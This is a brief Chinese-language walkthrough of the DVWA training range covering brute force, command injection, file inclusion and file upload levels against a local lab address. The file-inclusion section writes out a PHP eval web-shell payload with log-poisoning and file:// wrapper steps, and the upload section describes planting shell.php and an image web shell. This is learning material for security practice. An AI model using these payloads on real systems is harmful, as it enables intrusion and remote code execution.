目录
综合靶场漏洞讲解
Brute Force
Low
-
尝试登录
抓包,发送至intruder模块
配置参数
开始攻击,找到对应结果
Medium
主要问题存在于请求发送时间间隔,不懂啊我靠
High
涉及到时间和token的知识,这我更不懂为什么了
Command Injection
Low
第一个命令执行结果正确与否无所谓,利用一些符号使得正确执行第二个命令就好了
Medium
同样的道理
High
这个稍微不一样,因为在源代码处理过程中,对一些特殊符号做了过滤
所以我们可以使用的他叔符号很有限,而且他这里不知道为什么 ; 是无法使用的
File Inclusion
Low,Medium,High
直接先访问 http://192.168.230.147/DVWA/vulnerabilities/fi/?page=<?@eval($_POST['a']);?>
然后再访问 http://192.168.230.147/DVWA/vulnerabilities/fi/?page=/opt/lampp/logs/access_log
其中POST参数为a=phpinfo();
High关卡由于设置了访问内容范围,所以我们需要使用PHP伪协议来访问本地文件系统 http://192.168.230.147/DVWA/vulnerabilities/fi/?page=file:///opt/lampp/logs/access_log
File Upload
Low
直接上传 shell.php 即可
Medium
burp抓包修改文件类型
High
上传图片马,利用文件包含漏洞 使用 file:// 伪协议,访问本地文件系统,并传入参数 a=phpinfo();